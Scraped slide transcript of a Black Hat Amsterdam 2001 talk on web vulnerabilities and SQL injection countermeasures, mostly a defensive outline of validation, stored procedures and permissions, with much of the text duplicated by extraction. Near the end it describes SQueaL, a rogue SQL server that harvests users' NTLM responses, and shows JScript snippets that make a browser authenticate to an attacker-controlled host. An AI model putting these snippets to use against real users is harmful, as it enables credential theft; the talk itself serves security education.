welcome to blackhat! blackhat security briefings amsterdam 2001 timothy m. mullen anchoris.com, inc....
Post on 27-Dec-2015
223 Views
Preview:
TRANSCRIPT
Welcome to Blackhat!Welcome to Blackhat!
Blackhat Security BriefingsBlackhat Security Briefings
Amsterdam 2001Amsterdam 2001
Timothy M. MullenTimothy M. MullenAnchorIS.Com, Inc.AnchorIS.Com, Inc.
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Web Vulnerability and Web Vulnerability and SQL Injection SQL Injection Countermeasures Countermeasures Securing your servers from the most Securing your servers from the most
insidiousinsidiousof attacks:of attacks:
The demands of the Global Marketplace have made web The demands of the Global Marketplace have made web development more complex than ever. With customer development more complex than ever. With customer demands and competitive influences, the functions our demands and competitive influences, the functions our applications must be capable of performing constantly applications must be capable of performing constantly push our development into new areas. push our development into new areas.
Even with enterprise firewall solutions, hardened servers, Even with enterprise firewall solutions, hardened servers, and up-to-date web server software in place and and up-to-date web server software in place and properly configured, poor design methodology can leave properly configured, poor design methodology can leave
our systems open for attack.our systems open for attack. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Session OverviewSession Overview
Part I:Part I:∙ ∙ VulnerabilitiesVulnerabilities
Client-side HTML, URL Manipulation, SQL InjectionClient-side HTML, URL Manipulation, SQL Injection∙ ∙ CountermeasuresCountermeasures
Input Validation, Data Sanitation, Variable Typing, Input Validation, Data Sanitation, Variable Typing, Procedure Structure, Permissions and ACL’s.Procedure Structure, Permissions and ACL’s.
Part II:Part II:∙ ∙ Live Demos highlighting real-word sites with different Live Demos highlighting real-word sites with different
issues, participant involvement and brainstormingissues, participant involvement and brainstorming∙ ∙ SQueaL DemoSQueaL Demo (SQueaL is a NTLM logging rouge SQL (SQueaL is a NTLM logging rouge SQL
server app)server app)
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Part IPart I
VulnerabilitesVulnerabilites∙ ∙ Client-side HTMLClient-side HTML
∙ ∙ URL ManipulationURL Manipulation∙ ∙ SQL InjectionSQL Injection
CountermeasuresCountermeasures∙ ∙ Implementation/SetupImplementation/Setup ∙ Input Validation∙ Input Validation∙ ∙ Data SanitationData Sanitation ∙ Variable Typing∙ Variable Typing∙ ∙ Procedure StructureProcedure Structure ∙ Permissions and ACL’s∙ Permissions and ACL’s
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Vulnerabilities – Vulnerabilities – Lab DemosLab Demos
Client-side HTML IssuesClient-side HTML Issues∙ ∙ Web FormsWeb Forms∙ ∙ Input/Select controlsInput/Select controls∙ ∙ Hidden FieldsHidden Fields
URL ManipulationURL Manipulation∙ ∙ Editing the URLEditing the URL∙ ∙ Session variablesSession variables∙ ∙ CookiesCookies
SQL InjectionSQL Injection∙ ∙ The possibilities are endless!The possibilities are endless!
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Countermeasures-Countermeasures-Lab DemosLab Demos
Implementation and SetupImplementation and Setup∙ ∙ ADODB Connection Strings and DSN’sADODB Connection Strings and DSN’s
∙ ∙ ODBC Error reportingODBC Error reporting
∙ ∙ Custom error pagesCustom error pages
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Countermeasures-Countermeasures-Lab DemosLab Demos
Input ValidationInput Validation∙ ∙ Querystring count checkingQuerystring count checking
∙ ∙ Data Type ValidationData Type Validation
∙ ∙ Value/Length CheckingValue/Length Checking
∙ ∙ Extents/Boundary Checking Extents/Boundary Checking
∙ ∙ Host submission limits per unit of timeHost submission limits per unit of time
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Countermeasures-Countermeasures-Lab DemosLab Demos
Data SanitationData Sanitation∙ ∙ REPLACE functionREPLACE function
∙ ∙ RegExp function RegExp function
∙ ∙ Custom functions / explicit declarationsCustom functions / explicit declarations
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Countermeasures-Countermeasures-Lab DemosLab Demos
Variable TypingVariable Typing∙ ∙ Command objectCommand object
∙ ∙ Parameter declarationParameter declaration
∙ ∙ Command type declaration Command type declaration
∙ ∙ Execute as methodsExecute as methods
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Countermeasures-Countermeasures-Lab DemosLab Demos
SQL Stored Procedure StructureSQL Stored Procedure Structure∙ ∙ Use stored procedures whenever possibleUse stored procedures whenever possible
∙ ∙ Type cast variables Type cast variables
∙ ∙ Create and use Views as table sourcesCreate and use Views as table sources
∙ ∙ Avoid “Select *” statements for performance as well Avoid “Select *” statements for performance as well as securityas security
∙ ∙ sp_executeSQL procedure for ad hoc queriessp_executeSQL procedure for ad hoc queries
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Countermeasures-Countermeasures-Lab DemosLab Demos
Permissions and ACL’s.Permissions and ACL’s.∙ ∙ Open views, but lock down tablesOpen views, but lock down tables
∙ ∙ Use groupsUse groups
∙ ∙ lock down xp_cmdshell, xp_sendmail or removelock down xp_cmdshell, xp_sendmail or remove
∙ ∙ SQL Service contextSQL Service context
∙ ∙ Integrated/Mixed securityIntegrated/Mixed security
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Web Vulnerability and Web Vulnerability and SQL Injection SQL Injection Countermeasures Countermeasures Part I ConcludedPart I Concluded
15 Minute Break15 Minute Break
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Web Vulnerability and Web Vulnerability and SQL Injection SQL Injection CountermeasuresCountermeasuresWelcome Back!Welcome Back!
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Part IIPart II
Live Web Demos and FeedbackLive Web Demos and Feedback∙ ∙ Expose potentially insecure implementations of web Expose potentially insecure implementations of web applicationsapplications
∙ ∙ Discuss potential vulnerabilities and exploitsDiscuss potential vulnerabilities and exploits
∙ ∙ Mitigation and PreventionMitigation and Prevention
SQUeaL Demo: Grabbing NTLM SQUeaL Demo: Grabbing NTLM responses from unsuspecting responses from unsuspecting usersusers
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Web Vulnerabilities-Web Vulnerabilities-Live DemosLive Demos
Real-world web application issues Real-world web application issues and feedbackand feedback
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Web Vulnerabilities-Web Vulnerabilities-Live DemosLive Demos
SQUealL: NTLM logging rouge SQL SQUealL: NTLM logging rouge SQL ServerServer∙ ∙ Linux server application based on DilDog’s Linux server application based on DilDog’s “TalkNTLM” code“TalkNTLM” code
∙ ∙ Waits for TCP/IP connection on 1433, and attempts Waits for TCP/IP connection on 1433, and attempts to authenticate via NTLMto authenticate via NTLM
∙ ∙ Logs domain, username, and NTLM response Logs domain, username, and NTLM response
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Web Vulnerabilities-Web Vulnerabilities-Live DemosLive Demos
SQUeaL: Getting them to connectSQUeaL: Getting them to connect∙ ∙ ADODB Connection (Lame)ADODB Connection (Lame)conn=new ActiveXObject("ADODB.Connection");conn=new ActiveXObject("ADODB.Connection");
conn.ConnectionString='Provider=SQLOLEDB.1;Integrconn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial ated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';Library=dbnetlib';
conn.Open();conn.Open();
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Web Vulnerably and SQL Web Vulnerably and SQL Injection Injection Countermeasures Countermeasures SQUeaL: Getting them to connectSQUeaL: Getting them to connect
∙ ∙ DBNETLIB (Not so lame)DBNETLIB (Not so lame)
{ns = new {ns = new ActiveXObject("SQLNS.SQLNamespace");ActiveXObject("SQLNS.SQLNamespace");
ns.Initialize ("Grabber", 2, ns.Initialize ("Grabber", 2,
"Server=10.1.1.1;"Server=10.1.1.1;
Trusted_Connection=Yes;Trusted_Connection=Yes;
Network Library=dbnetlib.dll");Network Library=dbnetlib.dll"); }}
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
Web Vulnerability and Web Vulnerability and SQL Injection SQL Injection CountermeasuresCountermeasuresClosing RemarksClosing Remarks
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
THANK YOU!THANK YOU!
Additional Resources:Additional Resources:http://www.hammerofgod.comhttp://www.hammerofgod.comemailto:thor@hammerofgod.comemailto:thor@hammerofgod.com
http://www.securityfocus.comhttp://www.securityfocus.com http://www.sqlsecurity.comhttp://www.sqlsecurity.com http://heap.nologin.net/aspsec.htmlhttp://heap.nologin.net/aspsec.html http://security.devx.com/bestdefense/http://security.devx.com/bestdefense/
default.aspdefault.asp http://www.microsoft.com/technet/treeview/http://www.microsoft.com/technet/treeview/
default.asp?url=/technet/itsolutions/default.asp?url=/technet/itsolutions/security/database/database.aspsecurity/database/database.asp
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com
top related